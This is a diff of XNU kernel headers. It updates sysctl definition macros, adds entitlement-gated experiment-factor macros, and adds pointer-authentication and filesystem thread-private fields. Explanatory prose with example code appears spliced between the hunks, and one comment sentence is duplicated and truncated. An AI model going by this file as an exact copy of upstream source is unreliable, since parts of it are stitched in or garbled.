-#endif
-
 /*
  * Definitions for sysctl call.  The sysctl call uses a hierarchical name
  * for objects that can be examined or modified.  The name is expressed as
@@ -146,25 +145,29 @@ struct ctlname {
        int     ctl_type;       /* type of name */
 };
 
-#define CTLTYPE         0xf     /* Mask for the type */
-#define CTLTYPE_NODE    1       /* name is a node */
-#define CTLTYPE_INT     2       /* name describes an integer */
-#define CTLTYPE_STRING  3       /* name describes a string */
-#define CTLTYPE_QUAD    4       /* name describes a 64-bit number */
-#define CTLTYPE_OPAQUE  5       /* name describes a structure */
-#define CTLTYPE_STRUCT  CTLTYPE_OPAQUE  /* name describes a structure */
-
-#define CTLFLAG_RD      0x80000000      /* Allow reads of variable */
-#define CTLFLAG_WR      0x40000000      /* Allow writes to the variable */
-#define CTLFLAG_RW      (CTLFLAG_RD|CTLFLAG_WR)
-#define CTLFLAG_NOLOCK  0x20000000      /* XXX Don't Lock */
-#define CTLFLAG_ANYBODY 0x10000000      /* All users can set this var */
-#define CTLFLAG_SECURE  0x08000000      /* Permit set only if securelevel<=0 */
-#define CTLFLAG_MASKED  0x04000000      /* deprecated variable, do not display */
-#define CTLFLAG_NOAUTO  0x02000000      /* do not auto-register */
-#define CTLFLAG_KERN    0x01000000      /* valid inside the kernel */
-#define CTLFLAG_LOCKED  0x00800000      /* node will handle locking itself */
-#define CTLFLAG_OID2    0x00400000      /* struct sysctl_oid has version info */
+#define CTLTYPE             0xf             /* Mask for the type */
+#define CTLTYPE_NODE        1               /* name is a node */
+#define CTLTYPE_INT         2               /* name describes an integer */
+#define CTLTYPE_STRING      3               /* name describes a string */
+#define CTLTYPE_QUAD        4               /* name describes a 64-bit number */
+#define CTLTYPE_OPAQUE      5               /* name describes a structure */
+#define CTLTYPE_STRUCT      CTLTYPE_OPAQUE  /* name describes a structure */
+
+#define CTLFLAG_RD          0x80000000      /* Allow reads of variable */
+#define CTLFLAG_WR          0x40000000      /* Allow writes to the variable */
+#define CTLFLAG_RW          (CTLFLAG_RD|CTLFLAG_WR)
+#define CTLFLAG_NOLOCK      0x20000000      /* XXX Don't Lock */
+#define CTLFLAG_ANYBODY     0x10000000      /* All users can set this var */
+#define CTLFLAG_SECURE      0x08000000      /* Permit set only if securelevel<=0 */
+#define CTLFLAG_MASKED      0x04000000      /* deprecated variable, do not display */
+#define CTLFLAG_NOAUTO      0x02000000      /* do not auto-register */
+#define CTLFLAG_KERN        0x01000000      /* valid inside the kernel */
+#define CTLFLAG_LOCKED      0x00800000      /* node will handle locking itself */
+#define CTLFLAG_OID2        0x00400000      /* struct sysctl_oid has version info */
+#if XNU_KERNEL_PRIVATE
+#define CTLFLAG_PERMANENT   0x00200000      /* permanent sysctl_oid */
+#endif
+#define CTLFLAG_EXPERIMENT  0x00100000      /* Allows writing w/ the trial experiment entitlement. */
 
 /*
  * USE THIS instead of a hardwired number from the categories below
@@ -179,11 +182,22 @@ struct ctlname {
  * in I/O-Kit. In this case, you have to call sysctl_register_oid()
  * manually - just like in a KEXT.
  */
-#define OID_AUTO        (-1)
-#define OID_AUTO_START 100 /* conventional */
+#define OID_AUTO              (-1)
+#if XNU_KERNEL_PRIVATE
+/*
+ * Used to allow for most of the core kernel sysctl OIDs to be in immutable
+ * memory. The nodes that can be extensible have a fake first node with this
+ * particular oid_number which hangs a second mutable list from this node.
+ *
+ * This node is always first when it is used
+ */
+#define OID_MUTABLE_ANCHOR    (INT_MIN)
+#endif
+#define OID_AUTO_START        100 /* conventional */
 
 #ifdef KERNEL
-#define SYSCTL_HANDLER_ARGS (struct sysctl_oid *oidp, void *arg1, int arg2, \
+#define SYSCTL_HANDLER_ARGS \
+       (struct sysctl_oid *oidp __unused, void *arg1 __unused, int arg2 __unused, \
        struct sysctl_req *req)
 
 
@@ -286,7 +300,6 @@ int sysctl_io_opaque(struct sysctl_req *req, void *pValue, size_t valueSize, int
 void sysctl_register_oid(struct sysctl_oid *oidp);
 void sysctl_unregister_oid(struct sysctl_oid *oidp);
 
-void sysctl_load_devicetree_entries(void);
 #define nvram_osenvironment "osenvironment"
 void sysctl_set_osenvironment(unsigned int size, const void* value);
 void sysctl_unblock_osenvironment(void);
@@ -300,11 +313,6 @@ __END_DECLS
 #define SYSCTL_DECL(name)                                       \
        extern struct sysctl_oid_list sysctl_##name##_children
 
-#ifdef XNU_KERNEL_PRIVATE
-#define SYSCTL_LINKER_SET_ENTRY LINKER_SET_ENTRY
-#else
-#define SYSCTL_LINKER_SET_ENTRY(a, b)
-#endif
 /*
  * Macros to define sysctl entries.  Which to use?  Pure data that are
  * returned without modification, SYSCTL_<data type> is for you, like
@@ -334,65 +342,172 @@ __END_DECLS
 
 
 /* This constructs a "raw" MIB oid. */
-#define SYSCTL_STRUCT_INIT(parent, nbr, name, kind, a1, a2, handler, fmt, descr) \
-       {                                                                                               \
-               &sysctl_##parent##_children, { NULL },                  \
-               nbr, (int)(kind|CTLFLAG_OID2), a1, (int)(a2), #name, handler, fmt, descr, SYSCTL_OID_VERSION, 0 \
+#define SYSCTL_STRUCT_INIT(parent, nbr, name, kind, a1, a2, fn, fmt, desc) {    \
+           .oid_parent     = &sysctl_##parent##_children,                      \
+           .oid_number     = nbr,                                              \
+           .oid_kind       = (int)(kind | CTLFLAG_OID2),                       \
+           .oid_arg1       = a1,                                               \
+           .oid_arg2       = (int)(a2),                                        \
+           .oid_name       = #name,                                            \
+           .oid_handler    = fn,                                               \
+           .oid_fmt        = fmt,                                              \
+           .oid_descr      = desc,                                             \
+           .oid_version    = SYSCTL_OID_VERSION,                               \
        }
 
+#define __SYSCTL_OID(parent, nbr, name, kind, a1, a2, handler, fmt, descr) \
+       struct sysctl_oid sysctl_##parent##_##name = SYSCTL_STRUCT_INIT(\
+           parent, nbr, name, kind, a1, a2, handler, fmt, descr)
+
+#if XNU_KERNEL_PRIVATE
+
+/*
+ * Core kernel registers sysctls before lockdown and protects those entries
+ * in immutable memory.
+ *
+ * When a node needs to support dynamic extension after lockdown, it needs to be
+ * declared with SYSCTL_EXTENSIBLE_NODE() to insert a dummy "OID_MUTABLE_ANCHOR"
+ * node in this node chain which will allow extensibility.
+ *
+ * OIDs that are to be inserted dynamically based on system properties that
+ * aren't known at compile time have three options, in increasing order of
+ * unsafety:
+ *
+ * - The OID can use the CTLFLAG_NOAUTO flag. Such entries aren't inserted to
+ *   the sysctl tree automatically but will be made read-only at lock down.
+ *
+ *   Such entries must be inserted in the STARTUP_SUB_SYSCTL "Middle" phase
+ *   using sysctl_register_oid_early().
+ *
+ * - The OID can always be registered, with its handler testing whether it is
+ *   ready to operate.  When it is not, it must return ENOENT, which simulates
+ *   an absent entry.
+ *
+ *   This however has the downside that the entry is still resolvable as an MIB
+ *   This, however, has the downside that the entry is still resolvable as an MIB
+ *
+ *   This is acceptable for sysctls that will become valid quickly during boot
+ *   (but after lockdown).
+ *
+ * - SYSCTL_OID_MANUAL / SYSCTL_NODE_MANUAL can be used for completely
+ *   dynamic/manual oid registration. Such nodes must be registered with
+ *   sysctl_register_oid() after lockdown.
+ *
+ *   This is the least preferred solution.
+ */
+
+__BEGIN_DECLS
+void sysctl_register_oid_early(struct sysctl_oid *oidp);
+__END_DECLS
+
+#define SYSCTL_OID_MANUAL(parent, nbr, name, kind, a1, a2, handler, fmt, descr) \
+       __XNU_PRIVATE_EXTERN                                                    \
+       __SYSCTL_OID(parent, nbr, name, kind, a1, a2, handler, fmt, descr)
+
+#define SYSCTL_NODE_MANUAL(parent, nbr, name, access, handler, descr)           \
+       struct sysctl_oid_list sysctl_##parent##_##name##_children;             \
+       __XNU_PRIVATE_EXTERN                                                    \
+       __SYSCTL_OID(parent, nbr, name, CTLTYPE_NODE|access,                    \
+           &sysctl_##parent##_##name##_children, 0, handler, "N", descr);
+
+#define SYSCTL_OID(parent, nbr, name, kind, a1, a2, handler, fmt, descr)        \
+       __security_const_late __XNU_PRIVATE_EXTERN                              \
+       __SYSCTL_OID(parent, nbr, name, CTLFLAG_PERMANENT|kind,                 \
+           a1, a2, handler, fmt, descr);                                       \
+       __STARTUP_ARG(sysctl_##parent, _##name,                                 \
+           SYSCTL, STARTUP_RANK_SECOND, sysctl_register_oid_early,             \
+           &sysctl_##parent##_##name)
+
+#define __SYSCTL_NODE(parent, nbr, name, access, handler, descr)                \
+       __security_const_late                                                   \
+       struct sysctl_oid_list sysctl_##parent##_##name##_children;             \
+       __security_const_late __XNU_PRIVATE_EXTERN                              \
+       __SYSCTL_OID(parent, nbr, name, CTLFLAG_PERMANENT|CTLTYPE_NODE|access,  \
+           &sysctl_##parent##_##name##_children, 0, handler, "N", descr);      \
+       __STARTUP_ARG(sysctl_##parent, _##name,                                 \
+           SYSCTL, STARTUP_RANK_FIRST, sysctl_register_oid_early,              \
+           &sysctl_##parent##_##name)
+
+#define __SYSCTL_EXTENSION_NODE(name)                                           \
+       static __security_read_write                                            \
+       struct sysctl_oid_list sysctl_##name##_children_mutable;                \
+       static __security_const_late                                            \
+       struct sysctl_oid sysctl_##name##_wranchor = {                          \
+           .oid_parent     = &sysctl_##name##_children,                        \
+           .oid_number     = OID_MUTABLE_ANCHOR,                               \
+           .oid_kind       = CTLFLAG_OID2 | CTLFLAG_PERMANENT,                 \
+           .oid_arg1       = &sysctl_##name##_children_mutable,                \
+           .oid_name       = "__anchor__(" #name ")",                          \
+           .oid_version    = SYSCTL_OID_VERSION,                               \
+       };                                                                      \
+       __STARTUP_ARG(sysctl_##name, _wranchor,                                 \
+           SYSCTL, STARTUP_RANK_LAST, sysctl_register_oid_early,               \
+           &sysctl_##name##_wranchor)
+
+#define SYSCTL_NODE(parent, nbr, name, access, handler, descr)                  \
+       __XNU_PRIVATE_EXTERN                                                    \
+       __SYSCTL_NODE(parent, nbr, name, access, handler, descr)
+
+#define SYSCTL_EXTENSIBLE_NODE(parent, nbr, name, access, handler, descr)       \
+       __SYSCTL_NODE(parent, nbr, name, access, handler, descr);               \
+       __SYSCTL_EXTENSION_NODE(parent##_##name)
+#else
 #define SYSCTL_OID(parent, nbr, name, kind, a1, a2, handler, fmt, descr) \
-       struct sysctl_oid sysctl_##parent##_##name = SYSCTL_STRUCT_INIT(parent, nbr, name, kind, a1, a2, handler, fmt, descr); \
-       SYSCTL_LINKER_SET_ENTRY(__sysctl_set, sysctl_##parent##_##name)
+       __SYSCTL_OID(parent, nbr, name, kind, a1, a2, handler, fmt, descr)
 
 /* This constructs a node from which other oids can hang. */
-#define SYSCTL_NODE(parent, nbr, name, access, handler, descr)              \
-       struct sysctl_oid_list sysctl_##parent##_##name##_children;         \
-       SYSCTL_OID(parent, nbr, name, CTLTYPE_NODE|access,                  \
-                  (void*)&sysctl_##parent##_##name##_children, 0, handler, \
-                  "N", descr)
+#define SYSCTL_NODE(parent, nbr, name, access, handler, descr)                  \
+       struct sysctl_oid_list sysctl_##parent##_##name##_children;             \
+       SYSCTL_OID(parent, nbr, name, CTLTYPE_NODE|access,                      \
+           &sysctl_##parent##_##name##_children, 0, handler, "N", descr)
+#endif /* XNU_KERNEL_PRIVATE */
 
 /* Oid for a string.  len can be 0 to indicate '\0' termination. */
 #define SYSCTL_STRING(parent, nbr, name, access, arg, len, descr) \
        SYSCTL_OID(parent, nbr, name, CTLTYPE_STRING|access, \
-               arg, len, sysctl_handle_string, "A", descr)
+           arg, len, sysctl_handle_string, "A", descr)
 
 #define SYSCTL_COMPAT_INT(parent, nbr, name, access, ptr, val, descr) \
        SYSCTL_OID(parent, nbr, name, CTLTYPE_INT|access, \
-              ptr, val, sysctl_handle_int, "I", descr)
+           ptr, val, sysctl_handle_int, "I", descr)
 
 #define SYSCTL_COMPAT_UINT(parent, nbr, name, access, ptr, val, descr) \
        SYSCTL_OID(parent, nbr, name, CTLTYPE_INT|access, \
-               ptr, val, sysctl_handle_int, "IU", descr)
+           ptr, val, sysctl_handle_int, "IU", descr)
 
 /* Oid for an int.  If ptr is NULL, val is returned. */
 #define SYSCTL_INT(parent, nbr, name, access, ptr, val, descr) \
        SYSCTL_OID(parent, nbr, name, CTLTYPE_INT|access, \
-              ptr, val, sysctl_handle_int, "I", descr); \
-       typedef char _sysctl_##parent##_##name##_size_check[(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(int)) ? 0 : -1]
+           ptr, val, sysctl_handle_int, "I", descr); \
+       _Static_assert(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(int), \
+           "must be integer sized");
 
 /* Oid for an unsigned int.  If ptr is NULL, val is returned. */
 #define SYSCTL_UINT(parent, nbr, name, access, ptr, val, descr) \
        SYSCTL_OID(parent, nbr, name, CTLTYPE_INT|access, \
-               ptr, val, sysctl_handle_int, "IU", descr); \
-       typedef char _sysctl_##parent##_##name##_size_check[(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(unsigned int)) ? 0 : -1]
+           ptr, val, sysctl_handle_int, "IU", descr); \
+       _Static_assert(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(unsigned int), \
+           "must be integer sized");
 
 /* Oid for a long.  The pointer must be non NULL. */
 #define SYSCTL_LONG(parent, nbr, name, access, ptr, descr) \
        SYSCTL_OID(parent, nbr, name, CTLTYPE_INT|access, \
-               ptr, 0, sysctl_handle_long, "L", descr); \
-       typedef char _sysctl_##parent##_##name##_size_check[(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(long)) ? 0 : -1]
+           ptr, 0, sysctl_handle_long, "L", descr); \
+       _Static_assert(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(long), \
+           "must be long sized");
 
 /* Oid for a unsigned long.  The pointer must be non NULL. */
 #define SYSCTL_ULONG(parent, nbr, name, access, ptr, descr) \
        SYSCTL_OID(parent, nbr, name, CTLTYPE_INT|access, \
-               ptr, 0, sysctl_handle_long, "LU", descr); \
-       typedef char _sysctl_##parent##_##name##_size_check[(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(unsigned long)) ? 0 : -1]
+           ptr, 0, sysctl_handle_long, "LU", descr); \
+       _Static_assert(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(unsigned long), \
+           "must be long sized");
 
 /* Oid for a quad.  The pointer must be non NULL. */
 #define SYSCTL_QUAD(parent, nbr, name, access, ptr, descr) \
        SYSCTL_OID(parent, nbr, name, CTLTYPE_QUAD|access, \
-               ptr, 0, sysctl_handle_quad, "Q", descr); \
-       typedef char _sysctl_##parent##_##name##_size_check[(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(long long)) ? 0 : -1]
+           ptr, 0, sysctl_handle_quad, "Q", descr); \
+       _Static_assert(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(long long), \
+           "must be long long sized");
 
 /* Oid for an opaque object.  Specified by a pointer and a length. */
 #define SYSCTL_OPAQUE(parent, nbr, name, access, ptr, len, fmt, descr) \
@@ -402,8 +517,8 @@ __END_DECLS
 /* Oid for a struct.  Specified by a pointer and a type. */
 #define SYSCTL_STRUCT(parent, nbr, name, access, ptr, type, descr) \
        SYSCTL_OID(parent, nbr, name, CTLTYPE_OPAQUE|access, \
-               ptr, sizeof(struct type), sysctl_handle_opaque, \
-               "S," #type, descr)
+           ptr, sizeof(struct type), sysctl_handle_opaque, \
+           "S," #type, descr)
 
 /*
  * Oid for a procedure.  Specified by a pointer and an arg.
@@ -412,8 +527,111 @@ __END_DECLS
  */
 #define SYSCTL_PROC(parent, nbr, name, access, ptr, arg, handler, fmt, descr) \
        SYSCTL_OID(parent, nbr, name, access, \
-               ptr, arg, handler, fmt, descr)
+           ptr, arg, handler, fmt, descr)
+
+/*
+ * The EXPERIMENT macros below expose values for on-device experimentation (A/B testing) via Trial.
+ * These values will be set shortly after boot by the KRExperiments framework based on any
+ * active experiments on the device.
+ * Values exposed via these macros are still normal sysctls and can be set by the superuser in the
+ * development or debug kernel. However, on the release kernel they can ONLY be set by processes
+ * with the com.apple.private.write-kr-experiment-factors entitlement.
+ * In addition, for numeric types, special macros are provided that enforce a valid range for the value (inclusive)
+ * to ensure that an errant experiment can't set a totally unexpected value. These macros also track which
+ * values have been modified via sysctl(3) so that they can be inspected with the showexperiments lldb macro.
+ */
+
+struct experiment_spec {
+       void *ptr; /* ptr to numeric experiment factor. */
+       uint64_t min_value; /* Min value that can be set via sysctl(3) (inclusive). */
+       uint64_t max_value; /* Max value that can be set via sysctl(3) (inclusive). */
+       uint64_t original_value; /* First value that was overwritten via sysctl(3). */
+       _Atomic bool modified; /* Has this value ever been overwritten via sysctl(3)? */
+};
+
+/*
+ * The handlers for the numeric types can be easily parameterized by type.
+ * So they're defined via an X macro.
+ */
+#define experiment_factor_numeric_types \
+    X(uint, unsigned int) \
+    X(int, int) \
+    X(ulong, unsigned long) \
+    X(long, long) \
+    X(uint64, uint64_t) \
+    X(int64, int64_t)
+
+#define X(experiment_factor_typename, _) \
+int experiment_factor_##experiment_factor_typename##_handler SYSCTL_HANDLER_ARGS;
+
+experiment_factor_numeric_types
+#undef X
+
+#define __EXPERIMENT_FACTOR_SPEC(parent, name, p, min, max) \
+       struct experiment_spec experiment_##parent##_##name = { \
+               .ptr = p, \
+               .min_value = min, \
+               .max_value = max, \
+               .original_value = 0, \
+               .modified = false \
+       }
+
+#define EXPERIMENT_FACTOR_UINT(parent, name, ptr, min, max, descr) \
+       __EXPERIMENT_FACTOR_SPEC(parent, name, ptr, min, max); \
+       _Static_assert(sizeof(*(ptr)) == sizeof(unsigned int), "must be integer sized"); \
+       SYSCTL_PROC(parent, OID_AUTO, name, CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, &experiment_##parent##_##name, 1, &experiment_factor_uint_handler, "IU", descr);
+
+#define EXPERIMENT_FACTOR_INT(parent, name, ptr, min, max, descr) \
+       __EXPERIMENT_FACTOR_SPEC(parent, name, ptr, min, max); \
+       _Static_assert(sizeof(*(ptr)) == sizeof(int), "must be integer sized"); \
+       SYSCTL_PROC(parent, OID_AUTO, name, CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, &experiment_##parent##_##name, 1, &experiment_factor_int_handler, "I", descr);
+
+#define EXPERIMENT_FACTOR_ULONG(parent, name, ptr, min, max, descr) \
+       __EXPERIMENT_FACTOR_SPEC(parent, name, ptr, min, max); \
+       _Static_assert(sizeof(*(ptr)) == sizeof(unsigned long), "must be long sized"); \
+       SYSCTL_PROC(parent, OID_AUTO, name, CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, &experiment_##parent##_##name, 1, &experiment_factor_ulong_handler, "LU", descr);
 
+#define EXPERIMENT_FACTOR_LONG(parent, name, ptr, min, max, descr) \
+       __EXPERIMENT_FACTOR_SPEC(parent, name, ptr, min, max); \
+       _Static_assert(sizeof(*(ptr)) == sizeof(long), "must be long sized"); \
+       SYSCTL_PROC(parent, OID_AUTO, name, CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, &experiment_##parent##_##name, 1, &experiment_factor_long_handler, "L", descr);
+
+#define EXPERIMENT_FACTOR_UINT64(parent, name, ptr, min, max, descr) \
+       __EXPERIMENT_FACTOR_SPEC(parent, name, ptr, min, max); \
+       _Static_assert(sizeof(*(ptr)) == sizeof(uint64_t), "must be 8 bytes"); \
+       SYSCTL_PROC(parent, OID_AUTO, name, CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, &experiment_##parent##_##name, 1, &experiment_factor_uint64_handler, "QU", descr);
+
+#define EXPERIMENT_FACTOR_INT64(parent, name, ptr, min, max, descr) \
+       __EXPERIMENT_FACTOR_SPEC(parent, name, ptr, min, max); \
+       _Static_assert(sizeof(*(ptr)) == sizeof(int64_t), "must be 8 bytes"); \
+       SYSCTL_PROC(parent, OID_AUTO, name, CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, &experiment_##parent##_##name, 1, &experiment_factor_int64_handler, "Q", descr);
+
+/*
+ * Calls a user-provided handler to read / write this factor.
+ * Entitlement checking will still be done by sysctl, but it's the caller's responsibility to validate any new values.
+ * This factor will not be printed out via the showexperiments lldb macro.
+ */
+#define EXPERIMENT_FACTOR_PROC(parent, name, access, ptr, arg, handler, fmt, descr) \
+       _Static_assert(arg != 1, "arg can not be 1"); \
+       SYSCTL_PROC(parent, OID_AUTO, name, access | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, ptr, arg, handler, fmt, descr);
+
+#ifdef XNU_KERNEL_PRIVATE
+/*
+ * Sysctl handler for reading a simple counter.
+ * Using this directly is not recommended. Use the SYSCTL_SCALABLE_COUNTER macro
+ */
+int scalable_counter_sysctl_handler SYSCTL_HANDLER_ARGS;
+
+/*!
+ * @macro SYSCTL_SCALABLE_COUNTER
+ *
+ * @abstract
+ * Provides a sysctl for reading the value of a percpu counter.
+ */
+#define SYSCTL_SCALABLE_COUNTER(parent, name, counter, descr) \
+SYSCTL_PROC(parent, OID_AUTO, name, CTLTYPE_QUAD | CTLFLAG_RD | CTLFLAG_LOCKED, \
+    (void *)(&counter), 0, &scalable_counter_sysctl_handler, "Q", descr);
+#endif /* XNU_KERNEL_PRIVATE */
 
 extern struct sysctl_oid_list sysctl__children;
 SYSCTL_DECL(_kern);
@@ -1172,16 +1390,8 @@ extern char     macosproductversion[];
 extern char     macosversion[];
 #endif
 
-struct linker_set;
-
-void    sysctl_register_set(const char *set);
-void    sysctl_unregister_set(const char *set);
 void    sysctl_mib_init(void);
-
-int sysctl_int(user_addr_t, size_t *, user_addr_t, size_t, int *);
-int sysctl_quad(user_addr_t, size_t *, user_addr_t, size_t, quad_t *);
-
-void sysctl_early_init(void);
+void    hvg_bsd_init(void);
 
 #endif /* BSD_KERNEL_PRIVATE */
 #else   /* !KERNEL */
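A minimal usage sketch of the new experiment-factor macros (the tunable name, parent node, bounds, and description below are hypothetical, not part of this change): the per-type handler enforces the inclusive [min, max] range and records the first overwritten value in the backing experiment_spec so the showexperiments lldb macro can report it.

/* Hypothetical tunable exposed as kern.example_batch_size. */
static unsigned int example_batch_size = 32;

EXPERIMENT_FACTOR_UINT(_kern, example_batch_size, &example_batch_size, 1, 256,
    "example experiment factor, valid range [1, 256]");

On RELEASE kernels the resulting sysctl is writable only by processes holding the com.apple.private.write-kr-experiment-factors entitlement, per the comment above.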
index 8066c95f8cc7e01dcf3ba6ef0c511218bc19c9c5..ee460934be76559e4f6bbc6c4865f1e35e0595b6 100644 (file)
@@ -232,7 +232,8 @@ uint32_t throttle_lowpri_io(int sleep_amount);
 /* returns TRUE if the throttle_lowpri_io called with the same sleep_amount would've slept */
 int     throttle_lowpri_io_will_be_throttled(int sleep_amount);
 void    throttle_set_thread_io_policy(int policy);
-int             throttle_get_thread_effective_io_policy(void);
+int     throttle_get_thread_effective_io_policy(void);
+int     throttle_thread_io_tier_above_metadata(void);
 
 typedef struct __throttle_info_handle *throttle_info_handle_t;
 int     throttle_info_ref_by_mask(uint64_t throttle_mask, throttle_info_handle_t *throttle_info_handle);
index b849f3aeba16fe3b3a7dd8619cb7581da59f224b..2fdf66a4c2fdfbccab130d84ac4a760c7e2e66ef 100644 (file)
@@ -336,6 +336,11 @@ extern void ttyhold(struct tty *tp);
 
 #define PTS_MAJOR 4
 #define PTC_MAJOR 5
+/*
+ * If you need accounting, consider using
+ * KALLOC_HEAP_DEFINE to define a view.
+ */
+#define KM_TTYS     KHEAP_DEFAULT
 #endif /* defined(XNU_KERNEL_PRIVATE) */
 
 __END_DECLS
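For the KM_TTYS alias above: KHEAP_DEFAULT is the shared default kalloc heap, so tty allocations routed through it are not separately accounted. The sketch below illustrates the accounted alternative the comment points at; the view name, heap id, and call sites are assumptions for illustration, not taken from this commit.

/* Hypothetical accounted view of the default heap for tty allocations. */
KALLOC_HEAP_DEFINE(KHEAP_TTYS, "ttys", KHEAP_ID_DEFAULT);

static void *
ttys_alloc_example(vm_size_t size)
{
        /* Allocations made through the view are attributed to "ttys" in zone accounting. */
        return kheap_alloc(KHEAP_TTYS, size, Z_WAITOK | Z_ZERO);
}

static void
ttys_free_example(void *ptr, vm_size_t size)
{
        kheap_free(KHEAP_TTYS, ptr, size);
}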
index 50f97527a7f5153e1a542effccd86ab753086aa6..562a3e20eccbee71fc149f98865212e5b15e5ddb 100644 (file)
@@ -109,7 +109,7 @@ struct cs_blob {
        off_t           csb_end_offset;         /* Blob coverage area end, from csb_base_offset */
        vm_size_t       csb_mem_size;
        vm_offset_t     csb_mem_offset;
-       vm_address_t    csb_mem_kaddr;
+       void            * XNU_PTRAUTH_SIGNED_PTR("cs_blob.csb_mem_kaddr") csb_mem_kaddr;
        unsigned char   csb_cdhash[CS_CDHASH_LEN];
        ptrauth_generic_signature_t csb_cdhash_signature;
        const struct cs_hash  *csb_hashtype;
@@ -125,6 +125,7 @@ struct cs_blob {
        char            * XNU_PTRAUTH_SIGNED_PTR("cs_blob.csb_supplement_teamid") csb_supplement_teamid;
 #endif
        const CS_GenericBlob * XNU_PTRAUTH_SIGNED_PTR("cs_blob.csb_entitlements_blob") csb_entitlements_blob;    /* raw blob, subrange of csb_mem_kaddr */
+       ptrauth_generic_signature_t csb_entitlements_blob_signature;
        void *          XNU_PTRAUTH_SIGNED_PTR("cs_blob.csb_entitlements") csb_entitlements;       /* The entitlements as an OSDictionary */
        unsigned int    csb_signer_type;
        unsigned int    csb_reconstituted;      /* signature has potentially been modified after validation */
index 08be2fc3ae852e6ab7d326ea0c570a58eb3db3c3..d1b3c1aaaad766b270e4b629fd0192f2d468b247 100644 (file)
@@ -107,6 +107,9 @@ struct ucred {
                uid_t   cr_ruid;        /* real user id */
                uid_t   cr_svuid;       /* saved user id */
                u_short cr_ngroups;     /* number of groups in advisory list */
+#if XNU_KERNEL_PRIVATE
+               u_short __cr_padding;
+#endif
                gid_t   cr_groups[NGROUPS];/* advisory group list */
                gid_t   cr_rgid;        /* real group id */
                gid_t   cr_svgid;       /* saved group id */
index 502aae89a82b8112aebe03c7d84ef6d54aeb852e..5867dcb2d474d997cab4ec963adf1063dad6796e 100644 (file)
@@ -68,6 +68,9 @@
 #include <sys/un.h>
 #include <sys/ucred.h>
 #include <sys/socketvar.h>
+#if !KERNEL && PRIVATE
+#include <TargetConditionals.h>
+#endif
 
 /*
  * Protocol control block for an active
@@ -204,7 +207,7 @@ struct  xunpcb {
        u_quad_t                        xu_alignment_hack;
 };
 
-#if XNU_TARGET_OS_OSX || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR)
+#if XNU_TARGET_OS_OSX || KERNEL || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR)
 
 struct xunpcb64_list_entry {
        u_int64_t   le_next;
@@ -238,7 +241,7 @@ struct xunpcb64 {
        struct xsocket64        xu_socket;
 };
 
-#endif /* XNU_TARGET_OS_OSX || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) */
+#endif /* XNU_TARGET_OS_OSX || KERNEL || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) */
 
 #pragma pack()
 
index 53fdcdb9426907ff4acf08d1b893d26db96ac39c..9a2934f4ed5d5520b446d5512e91a354c485b222 100644 (file)
@@ -332,6 +332,9 @@ struct uthread {
        /* Document Tracking struct used to track a "tombstone" for a document */
        struct doc_tombstone *t_tombstone;
 
+       /* Field to be used by filesystems */
+       uint64_t t_fs_private;
+
        struct os_reason *uu_exit_reason;
 };
 
index 0ae525055ae1c2b26ca3f3afe60891a2fab5bf5b..aa0cd6aa465133a952d01e42f207454596745b0b 100644 (file)
@@ -70,7 +70,9 @@
 #include <sys/kernel_types.h>
 #include <sys/param.h>
 #include <sys/signal.h>
-#endif
+#else
+#include <stdint.h>
+#endif /* KERNEL */
 
 /*
  * The vnode is the focus of all file activity in UNIX.  There is a
@@ -1513,6 +1515,30 @@ int     vfs_ctx_skipatime(vfs_context_t ctx);
 
 #endif
 
+/* Supported filesystem tags for vfs_[set|get]_thread_fs_private */
+#define FS_PRIVATE_TAG_APFS (1)
+
+/*!
+ *  @function vfs_set_thread_fs_private
+ *  @abstract Set the per-thread filesystem private data field.
+ *  @discussion Allows a filesystem to store an implementation-specific value in the thread struct.
+ *  Note that this field is common to all filesystems, so re-entrancy should be taken into consideration.
+ *  @param tag Filesystem identification tag.
+ *  @param fs_private The value to be set.
+ *  @return 0 for success, ENOTSUP if the filesystem tag is not supported.
+ */
+int vfs_set_thread_fs_private(uint8_t tag, uint64_t fs_private);
+
+/*!
+ *  @function vfs_get_thread_fs_private
+ *  @abstract Return the per-thread filesystem private data field.
+ *  @discussion Returns the per-thread value that was set by vfs_set_thread_fs_private().
+ *  @param tag Filesystem identification tag.
+ *  @param fs_private Out parameter receiving the stored per-thread value.
+ *  @return 0 for success, ENOTSUP if the filesystem tag is not supported.
+ */
+int vfs_get_thread_fs_private(uint8_t tag, uint64_t *fs_private);
+
 /*!
  *  @function vflush
  *  @abstract Reclaim the vnodes associated with a mount.
@@ -2421,6 +2447,9 @@ vnode_t vfs_context_get_cwd(vfs_context_t); /* get cwd with iocount */
 int vnode_isnoflush(vnode_t);
 void vnode_setnoflush(vnode_t);
 void vnode_clearnoflush(vnode_t);
+#if CONFIG_IO_COMPRESSION_STATS
+void vnode_iocs_record_and_free(vnode_t);
+#endif /* CONFIG_IO_COMPRESSION_STATS */
 
 #define BUILDPATH_NO_FS_ENTER     0x1 /* Use cache values, do not enter file system */
 #define BUILDPATH_CHECKACCESS     0x2 /* Check if parents have search rights */
@@ -2439,4 +2468,34 @@ __END_DECLS
 
 #endif /* KERNEL */
 
+/*
+ * Structure for vnode level IO compression stats
+ */
+
